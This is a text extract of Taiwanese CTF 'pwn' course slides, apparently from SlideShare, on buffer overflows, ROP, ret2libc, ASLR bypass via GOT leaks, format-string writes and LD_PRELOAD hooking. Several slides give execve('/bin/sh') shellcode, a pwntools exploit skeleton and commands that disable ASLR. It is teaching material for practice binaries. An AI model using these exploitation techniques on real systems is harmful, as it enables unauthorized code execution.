TDOH x 台科 pwn課程
•
18 likes•2,643 views
The document provides an overview of basic penetration testing techniques including buffer overflow vulnerabilities, return oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the structure of the x86 stack, overwriting the return address, and controlling the instruction pointer. It also covers ROP techniques like ret2libc, gadgets, chaining, and using libc functions. Finally, it briefly mentions tools like pwntools, ROPgadget, and techniques like IO wrapping and LD_PRELOAD hijacking.
More Related Content
What's hot
What's hot (20)
Viewers also liked
Viewers also liked (20)
Similar to TDOH x 台科 pwn課程
Similar to TDOH x 台科 pwn課程 (20)
Recently uploaded
Recently uploaded (20)
TDOH x 台科 pwn課程
- 1. PWN Basic II
- 2. ….
- 3. PWN )
- 4. QAQ
- 5. <(_ _)>
- 6. • Ubuntu VM • practices.tar.gz
- 7. PWN
- 8. PWN CTF CTF
- 9. • IP port •
- 10. Overflow
- 11. btw… btw..
- 12. Overflow
- 13. Overflow
- 14. ....... ?
- 15. Outline • Buffer Overflow • ROP ( Return Oriented Programing ) • ret2libc • ret2text • gadgets • format string vulnerability • CTF ( Attack & Defense )
- 16. Buffer Overflow
- 18. x86 Stack Layout buffer >> EBP Return Address Arg 1 Arg 2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08
- 19. Buffer Overflow void Function( arg1, arg2 ) { char buffer[16]; … … scanf(“%s”, &buffer); … … } push ebp mov ebp, esp sub ebp, 0x10 … … ———> ———> buffer EBP Return Address arg1 arg2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 ———> EBP - 0x0C EBP - 0x10
- 20. Buffer Overflow void Function( arg1, arg2 ) { char buffer[16]; … … scanf(“%s”, &buffer); … … } ———>
- 21. AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA Buffer Overflow
- 22. Buffer Overflow AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10
- 23. Buffer Overflow AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10 buffer EBP Return Address arg1 arg2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10 Before After
- 25. Buffer Overflow ret = pop eip jmp AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … ESP >>
- 26. Control EIP ? Buffer Overflow
- 27. Practice #1
- 28. Practice #1
- 29. Step #1 • Return Address ? • buffer • • pwntools (http://pwntools.com/)
- 30. Step #2 •
- 31. Step #3 from pwn import * r = process('./pratice1') eip = payload = 'a' * + p32(eip) r.sendline(payload) r.interactive()
- 34. AAAA AAAA AAAA AAAA AAAA 0x8000f04 or -> jmp esp shellcode … 0x8000f00 0x8000f04 0x8000f08 0x8000ffc 0x8000ff8 0x8000ff4 0x8000ff0 0x8000fec Buffer Overflow
- 35. Practice #2
- 36. Step #1 Find Return Address
- 37. Step #2 • Stack • gdb ? gdb stack • coredump $ ulimit -c unlimited $ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/ core_pattern’ • jmp esp
- 38. Step #2
- 39. Step #2 jmp esp ?
- 40. Step #3 ShellCode ShellCode nasm DIY scanf 0x0b 0x0a 0x00 … etc shellcode
- 41. Step #3Step #3 08048062 <starter>: 8048062: 31 c0 xor eax,eax 8048064: 40 inc eax 8048065: 40 inc eax 8048066: 40 inc eax 8048067: 40 inc eax 8048068: 40 inc eax 8048069: 40 inc eax 804806a: 40 inc eax 804806b: 40 inc eax 804806c: 40 inc eax 804806d: 40 inc eax 804806e: 40 inc eax 804806f: 31 c9 xor ecx,ecx 8048071: 51 push ecx 8048072: 68 2f 2f 73 68 push 0x68732f2f 8048077: 68 2f 62 69 6e push 0x6e69622f 804807c: 89 e3 mov ebx,esp 804807e: 31 d2 xor edx,edx 8048080: cd 80 int 0x80 ebx = “bin/shx00” ecx= 0 eax= 11 edx = 0 execve
- 43. Step #4 • payload = ‘a’ * ?? + stack_address + shellcode • Write Exploit ~~~
- 51. ROP ret ret
- 53. ROP
- 54. ROP
- 57. ROP - ret2libc aaaa aaaa aaaa aaaa aaaa system fake ret address “/bin/sh” 0xffffcff0 0xffffcff4 0xffffcff8 0xffffcfe8 0xffffcfec 0xffffcfe4 0xffffcfe0 0xffffcfdc 0xffffcffc <— return system <- return <- system “/bin/sh”
- 58. Practice #3
- 59. Step #1 Find Return Address
- 60. Step #2 • system ? • “/bin/sh” ? echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
- 61. Step #3 • Write Payload aaaa aaaa aaaa aaaa aaaa system addr fake ret address “/bin/sh”
- 62. ROP ret2text return code / plt PIE text static link Code
- 63. ROP gadgets
- 64. ROP - gadgets pop edx ret xor eax,eax ret push esp ret mov eax,ebx ret
- 65. ROP - gadgets R/W Register: pop eax ret R/W Memory: pop edx pop eax mov [eax],edx ret Logical Operation: xor eax,eax and eax,ecx
- 66. ROP chain pop edx ret pop eax ret 0x080481c9 controll edx 0x08043a24 controll eax ... ... 0x080481c9 0x08043a24 ... ret
- 67. ROP - gadgets
- 70. ROPgadget.py • ret gadgets • ROP chain
- 71. Practice #4
- 72. • ROPgadget • objdump -d filename • | less less
- 74. ASLR Address Space Layout Randomization
- 76. ASLR • cat /proc/<pid>/maps section • ASLR shared lib stack heap
- 78. ....
- 81. ASLR
- 82. ?
- 83. system
- 84. • Libc • Libc • got.plt • system…
- 85. • oveflow binary puts write fwrite …… got stdout • got • system ‘bin/sh’ • overflow system(“/bin/sh”)
- 88. Practice #5
- 89. • pwntools ELF binary • pwntools ELF.symbol[func_name] plt • pwntools ELF.got[function_name] got • puts leak got • system ”bin/sh”
- 91. scanf printf
- 92. printf
- 93. scanf
- 95. %n ..?
- 96. %n • • Ex. • printf(“12345%n”, &a): • 5 a
- 97. • format String %n • %hn %hhn • %n 4 byte (int) • %hn 2 byte (short) • %hhn 1 byte (byte)
- 98. ....
- 99. 3
- 101. payload der (X
- 102. IOWrapper
- 103. IO Wrapper • • • flag • • der
- 104. IO Wrapper • printf puts …… etc • scanf gets ...... etc /
- 105. IO Wrapper IO Wrapper Process 1 Process 2 Process … execvp socket server
- 106. IO Wrapper • ? • fork() • pid_t pid = fork(); if ( pid == 0 ) { /* sub process */ execvpe(…); } else { /* parent */ }
- 107. IO Wrapper • stdin/stdout ? • pipe • pipe : pipe() dup2()
- 108. IO Wrapper • while ( true ) { fread(stdin, ….. ); /* may blocked */ fwrite(stdin_of_sub_process,…..); fread(stdin, ….. ); /* may blocked */ fwrite(stdout, …..); } IO Blocked
- 109. select
- 110. IO Wrapper • select() and pselect() allow a program to monitor multiple file descriptors, waiting until one or more of the file descriptors become "ready" for some class of I/O operation (e.g., input possible). A file descriptor is considered ready if it is possible to perform a corresponding I/O operation (e.g., read(2) without blocking, or a sufficiently small write(2)). http://man7.org/linux/man-pages/man2/select.2.html
- 112. • file descriptor (fd) fd • blocked
- 113. select fd
- 115. LD_PRELOAD
- 117. LD_PRELOAD • mylib.c #include <stddef.h> #include <stdio.h> int puts(const char * str) { /* */ }
- 118. LD_PRELOAD • main.c #include <stdlib.h> #include <stdio.h> void main(int argc,char * argv[]) { puts(“Hello World”); }
- 119. LD_PRELOAD • $ gcc -Wall -fpic -shared -o mylib.so mylib.c • $ gcc -o main main.c • $ LD_PRELOAD=./mylib.so • $ ./main
- 120. <(_ _)>
- 121. Reference • http://drops.wooyun.org/tips/6597 • AIS3 Binary Exploit • http://pwntools.readthedocs.org/en/latest/ dynelf.html • http://www.slideshare.net/hackstuff/rop-40525248